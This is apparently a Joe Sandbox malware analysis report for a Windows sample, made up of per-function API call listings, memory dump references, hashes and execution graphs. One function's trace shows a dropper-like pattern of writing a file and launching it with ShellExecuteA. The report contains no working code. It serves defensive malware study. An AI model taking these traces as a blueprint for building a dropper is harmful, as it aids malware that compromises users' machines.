                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,02E6D10B,00000000,02E6D11E), ref: 02E4C47A
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02E4C48B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                              • API String ID: 1646373207-3712701948
                                                                                                              • Opcode ID: 7983fc3b37fd28ebf98345e80d0040f8c595121828ab34e21ad89ed8d4b9f2dc
                                                                                                              • Instruction ID: e3a86595fd230e3a6b67826bd642345029d25f5cdd9e6380eba0c7631fa4cb2a
                                                                                                              • Opcode Fuzzy Hash: 7983fc3b37fd28ebf98345e80d0040f8c595121828ab34e21ad89ed8d4b9f2dc
                                                                                                              • Instruction Fuzzy Hash: A8D05EE4AC13145EE600ABB27588A3326988308354BA8F866F4024F142EF7298508F95
                                                                                                              APIs
                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E4E297
                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E4E2B3
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E4E32A
                                                                                                              • VariantClear.OLEAUT32(?), ref: 02E4E353
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 920484758-0
                                                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                              • Instruction ID: 55a0bf7317df59d1100071a63060cf6ca267d325648f98d0b82dcbbdf6511067
                                                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                              • Instruction Fuzzy Hash: BD411875A412299FCB62DF58DC90BD9B3BDBF49304F0492D5EA4CA7211DA30AF808F64
                                                                                                              APIs
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E4AD59
                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E4AD7D
                                                                                                              • GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E4AD98
                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E4AE2E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 3990497365-0
                                                                                                              • Opcode ID: 177f8a67da5b1a62d6d12b74cff9f2ee4a7c4aa3af20937254d63a990fca58f4
                                                                                                              • Instruction ID: 6aeb09ec8ec189f6d44cad1fc9692eae09227b827cf7eca156ee45543eb6c52a
                                                                                                              • Opcode Fuzzy Hash: 177f8a67da5b1a62d6d12b74cff9f2ee4a7c4aa3af20937254d63a990fca58f4
                                                                                                              • Instruction Fuzzy Hash: 02413970A802589BDB21DB68EC84BDAB7FDAB48314F4490F6A548E7341DB70AF84CF50
                                                                                                              APIs
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E4AD59
                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E4AD7D
                                                                                                              • GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E4AD98
                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E4AE2E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 3990497365-0
                                                                                                              • Opcode ID: f0ae08714b553b327aac5225418df49c9cddce6ef11d420807fd9565cc2d59fe
                                                                                                              • Instruction ID: 21fea448b4b4534288fdda132632f64f4d60cc7ad8a97b4c7699fc2cded37046
                                                                                                              • Opcode Fuzzy Hash: f0ae08714b553b327aac5225418df49c9cddce6ef11d420807fd9565cc2d59fe
                                                                                                              • Instruction Fuzzy Hash: E6415870A802589BDB21DB68EC84BDAB7FDAB48314F4494F6A548E7341DB70AF84CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08ffc183049a350f4cadde1aef15bb0c15c3094a757791cbca4a1fb1fc0e3026
                                                                                                              • Instruction ID: a2ac8ed280d08d892f13229dd964995fbd0fa5a9435137d29f3ed9c7b01ac161
                                                                                                              • Opcode Fuzzy Hash: 08ffc183049a350f4cadde1aef15bb0c15c3094a757791cbca4a1fb1fc0e3026
                                                                                                              • Instruction Fuzzy Hash: 7CA1E9A67906000BDF189A7DFC843AD73829BC5369F19D27EE51DCF381EF6489C68650
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02E495DA), ref: 02E49572
                                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02E495DA), ref: 02E49578
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                              • String ID: yyyy
                                                                                                              • API String ID: 3303714858-3145165042
                                                                                                              • Opcode ID: 45f79ba778805e376cde291cd9535a7694b7436dd4f24551ca44a4a31ee09923
                                                                                                              • Instruction ID: f253da68c8be1da98a108ab28e6508a25df246c604f714c754b606a5c9f25b98
                                                                                                              • Opcode Fuzzy Hash: 45f79ba778805e376cde291cd9535a7694b7436dd4f24551ca44a4a31ee09923
                                                                                                              • Instruction Fuzzy Hash: 59218D71A402589FDB10DFA8E881BAEB3B9EF09700F5190A5F905E7281DF349E40CBA5
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E583C2), ref: 02E583A4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                                              • API String ID: 3811539418-184458249
                                                                                                              • Opcode ID: d4b64b9bc19982e820335e6a0c358cccf2c5b9dc3c3f795209be26927ff4d550
                                                                                                              • Instruction ID: 4f71530b6a8b8ececc916459783e1c4850ba3523e55a6dedf3ec13c7660e0f56
                                                                                                              • Opcode Fuzzy Hash: d4b64b9bc19982e820335e6a0c358cccf2c5b9dc3c3f795209be26927ff4d550
                                                                                                              • Instruction Fuzzy Hash: 880144717D0304AFE700EE95EC41B5A779DE748700F51A460BD04D6640D674AD908E24
                                                                                                              APIs
                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5AF58
                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 02E5AF88
                                                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 02E5AFA7
                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5AFB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Read$Write
                                                                                                              • String ID:
                                                                                                              • API String ID: 3448952669-0
                                                                                                              • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                              • Instruction ID: 582068c286482cf08e5afecce5c4ca81813e883b4aa2864567016e92e5250c6f
                                                                                                              • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                              • Instruction Fuzzy Hash: D021A5B26906299FDB10DF66DC80BAE73AAEF44315F00D661FD1497384D734E81186B0

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:25%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:13.9%
                                                                                                              Total number of Nodes:36
                                                                                                              Total number of Limit Nodes:2
                                                                                                              execution_graph 247 401000 malloc 248 401031 247->248 267 401453 _XcptFilter 249 401475 memset 250 58c000 249->250 251 4014a2 __set_app_type _controlfp __getmainargs 250->251 254 4013ff 251->254 253 401518 exit 255 40141a 254->255 258 40108c memset memset 255->258 257 401443 257->253 259 401141 258->259 260 40134e 259->260 261 401164 strcmp 259->261 260->257 262 401191 EntryPoint strcpy 261->262 263 4011db EntryPoint getenv EntryPoint sprintf 261->263 264 40126b fopen EntryPoint fwrite fclose 262->264 263->264 265 401310 EntryPoint ShellExecuteA 264->265 266 401349 264->266 265->266 266->257 268 401155 269 401141 268->269 270 401164 strcmp 268->270 269->270 271 40134e 269->271 272 401191 EntryPoint strcpy 270->272 273 4011db EntryPoint getenv EntryPoint sprintf 270->273 274 40126b fopen EntryPoint fwrite fclose 272->274 273->274 275 401310 EntryPoint ShellExecuteA 274->275 276 401349 274->276 275->276 282 401526 _controlfp 283 40108c 15 API calls 282->283 284 401580 283->284 277 4015d7 SetUnhandledExceptionFilter 278 4bf794 279 4bf7a0 278->279 279->278 280 4bf8b4 GetPEB 279->280 281 4bf7e1 279->281

                                                                                                              Callgraph

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                              • String ID: %s\%s
                                                                                                              • API String ID: 2742963760-4073750446
                                                                                                              • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                              • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                              • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                              • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2992075992-0
                                                                                                              • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                              • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                              • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                              • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1611591150-0
                                                                                                              • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                              • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                              • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                              • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc
                                                                                                              • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                              • API String ID: 2803490479-2443507578
                                                                                                              • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                              • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                              • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                              • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                              • String ID: D`4wD`4w$D`4wD`4w
                                                                                                              • API String ID: 4108700736-3394693991
                                                                                                              • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                              • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                              • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                              • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 43 4bf794-4bf79e 44 4bf7bf-4bf7c1 43->44 45 4bf7a0 43->45 46 4bf7ab-4bf7ad 44->46 47 4bf7c3 44->47 48 4bf7b2-4bf7bb 45->48 49 4bf7a2 45->49 50 4bf7af 46->50 51 4bf7a6-4bf7aa 46->51 47->46 54 4bf7c5-4bf7c7 47->54 52 4bf7c9-4bf7d0 48->52 53 4bf7bd 48->53 49->48 55 4bf7a4 49->55 50->51 56 4bf7b1 50->56 51->46 52->44 57 4bf7d2 52->57 53->44 53->52 54->52 55->51 56->48 57->44 58 4bf7d4-4bf7d9 57->58 59 4bf7eb-4bf7f0 58->59 60 4bf7db 58->60 61 4bf7f2-4bf7f6 59->61 62 4bf806-4bf809 59->62 60->59 63 4bf7dd 60->63 61->62 64 4bf7f8 61->64 65 4bf80b 62->65 66 4bf7e5-4bf7e8 62->66 63->43 67 4bf7df 63->67 68 4bf7fa 64->68 69 4bf811-4bf815 64->69 65->66 70 4bf80d-4bf80f 65->70 67->48 71 4bf7e1-4bf7e3 67->71 68->69 72 4bf7fc 68->72 69->62 73 4bf817-4bf81e 69->73 70->69 71->66 72->44 74 4bf7fe 72->74 75 4bf800-4bf805 73->75 76 4bf820 73->76 74->48 74->75 75->62 76->75 77 4bf822 76->77 77->44 78 4bf824 77->78 78->43 79 4bf82a 78->79 80 4bf834-4bf83b 79->80 81 4bf83d 80->81 82 4bf86c-4bf873 80->82 81->82 83 4bf83f 81->83 84 4bf889-4bf88c 82->84 85 4bf875-4bf87b 82->85 87 4bf840-4bf841 83->87 85->84 86 4bf87d 85->86 88 4bf8a8-4bf8ae 86->88 89 4bf87f 86->89 90 4bf883-4bf885 87->90 91 4bf843 87->91 93 4bf887 88->93 96 4bf8b0 88->96 89->88 92 4bf881 89->92 90->93 94 4bf864-4bf868 90->94 91->90 95 4bf845 91->95 92->90 93->84 98 4bf86a 94->98 99 4bf891-4bf894 94->99 95->43 97 4bf84b 95->97 100 4bf84d-4bf84f 96->100 101 4bf8b2 96->101 97->99 97->100 98->82 98->99 99->84 102 4bf896 99->102 100->94 103 4bf851 100->103 101->100 104 4bf8b4-4bf8ba GetPEB 101->104 105 4bf85b-4bf863 102->105 106 4bf898 102->106 103->94 107 4bf853 103->107 106->87 108 4bf89a 106->108 107->80 109 4bf855 107->109 108->87 110 4bf89c 108->110 109->75 111 4bf857-4bf859 109->111 110->66 112 4bf8a2 110->112 111->105 112->48 112->88
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                              • Instruction ID: 9dce6d6b8b05ab0a555f06944759f9cc391f65fca432f5fc4cfe5cd17794a38a
                                                                                                              • Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                              • Instruction Fuzzy Hash: 9631F3329052446ACF32A96C5C146F77B64AB62BB0F1C45F7E44C86792DB2C8C4DC2BC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                              • Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
                                                                                                              • Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                              • Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:12.1%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:6
                                                                                                              Total number of Limit Nodes:2
                                                                                                              execution_graph 25188 121ef08 25189 121ef25 25188->25189 25191 121ef4d 25188->25191 25190 121ef6e 25191->25190 25192 121f036 GlobalMemoryStatusEx 25191->25192 25193 121f066 25192->25193

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
